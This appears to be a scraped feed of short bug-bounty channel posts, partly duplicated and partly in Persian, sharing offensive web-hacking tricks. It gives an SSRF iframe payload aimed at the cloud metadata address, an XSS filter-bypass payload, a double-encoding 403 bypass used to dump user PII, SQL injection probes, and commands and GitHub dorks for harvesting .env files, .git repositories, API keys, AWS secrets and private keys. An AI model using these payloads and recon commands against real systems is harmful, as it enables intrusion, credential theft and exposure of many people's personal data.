Dagen (security)
https://freedium.cfd/25-000-ssrf-in-hackerones-analytics-reports-b9a5b3aa3d6e
easy ssrf in hackerone😎
just inject this payload in pdf file rendering :
just inject this payload in pdf file rendering :
<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
Dagen (security)
https://freedium.cfd/https://medium.com/legionhunters/subdomain-dork-recon-via-3rd-party-54ea05b59a62
اگه به ریکان سابدامین با گوگل دورک علاقه دارید، این مقاله رو از دست ندید! 👀
نویسنده با معرفی چند منبع کمتر شناختهشده، راههای خلاقانهای برای پیدا کردن سابدامینهای تارگت بهتون یاد میده .
نویسنده با معرفی چند منبع کمتر شناختهشده، راههای خلاقانهای برای پیدا کردن سابدامینهای تارگت بهتون یاد میده .
👍1
Dagen (security)
https://osintteam.blog/13-950-bounty-stored-xss-in-gitlab-notes-with-a-clever-csp-bypass-via-base-9ca1f49994e3
Gitlab Stored xss with <base> Tag + CSP bypass 🤌🔥
easy 50$ with this google dork :🗿
api key test and worked:)
site:target.org intext:"test_" + intext:"api key"
api key test and worked:)
❤3🌚2
4.5M users' PII dumped + 20k bounty 🤯
/get_all_users —> 403 Forbidden
/get_all_userz —> 404 Not Found
final path:
all user data dump :)
source :
/get_all_users —> 403 Forbidden
/get_all_userz —> 404 Not Found
just double-encode "S" bypass nginx filter
final path:
/get_all_user%2573
all user data dump :)
source :
https://www.youtube.com/watch?v=PXqlHAoF2wc❤4👍1
Easily Detect SQL Injection Points 🛡
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1''asd''
❤7👍1
Dagen (security)
https://freedium.cfd/https://infosecwriteups.com/100-200-worth-403-bypass-techniques-e4c22064091a
Easy Tricks to Get Around 403 Forbidden Blocks 👀
simple information disclosure :🤌
find this endpoint :
just change api version and fuzz the clubname
whats happend ? leak the email of owner & phone number, id , state.🗿
find this endpoint :
GET v2/user/profile?clubname=123
just change api version and fuzz the clubname
GET v1.0/user/profile?clubname=447 —> FUZZ
whats happend ? leak the email of owner & phone number, id , state.🗿
❤4
#Methodology
finding secrets source in .map file :👀
step 1 : finding the js file like this : main.min.js , bundle.js , app.js
step 2 : add .map in append
step 3 : unpacking :
information leak like admins token & sensitive endpoint :)
finding secrets source in .map file :👀
step 1 : finding the js file like this : main.min.js , bundle.js , app.js
step 2 : add .map in append
step 3 : unpacking :
npx source-map-unpacker -p main.min.js.map
information leak like admins token & sensitive endpoint :)
⚡3👍1
Xss payload when javanoscript: and () Filtered :
<a href="jav
anoscript:
confirm``">click me</a>
❤1
#Methodology
Find Dev files : .env , .git , .bak , .log , .sql 👀
- historical URL
-Directory bruteforce —> wordlist : https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/fuzz-Bo0oM.txt
github Dorking
ok if find it how to use .git ? use Git dumper
impact : leak privet api key
Find Dev files : .env , .git , .bak , .log , .sql 👀
- historical URL
gau --subs target.com | grep -iE "\.git|\.env|\.log|\.sql"
-Directory bruteforce —> wordlist : https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/fuzz-Bo0oM.txt
ffuf -u https://target.com/FUZZ -w dev_files.txt -t 100
github Dorking
filename:.env DB_PASSWORD site:github.com
ok if find it how to use .git ? use Git dumper
git-dumper https://target.com/.git/ /tmp/output
cd /tmp/output && cat config && git log
impact : leak privet api key
❤5🔥1
#Methodology
github recon :
-json search
-organization name
-sensitive file
-language
-custom github Dork
————————————————————-
tool : https://github.com/hisxo/gitGraber
-search for domain
github recon :
"example.com" password
-json search
"example.com" "password":
-organization name
org:example password
-sensitive file
"example.com" path:/.env
-language
"example.com" language:PHP password
-custom github Dork
"domain" AND ("api_key" OR "secret" OR "password" OR "access_token" OR "client_secret" OR "private_key" OR "AWS_SECRET_ACCESS_KEY" OR "DB_PASSWORD" OR "slack_token" OR "github_token" OR "BEGIN RSA PRIVATE KEY")
————————————————————-
tool : https://github.com/hisxo/gitGraber
-search for domain
python3 gitGraber.py -k wordlists/keywords.txt -q "example.com" -s
❤1🔥1